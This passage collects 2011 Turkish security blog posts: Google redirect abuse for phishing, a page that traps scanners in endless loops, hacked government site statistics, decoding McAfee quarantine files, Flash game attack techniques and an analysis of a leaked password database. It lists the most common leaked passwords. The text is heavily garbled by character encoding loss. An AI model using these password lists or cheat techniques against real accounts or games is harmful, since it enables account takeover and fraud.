Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

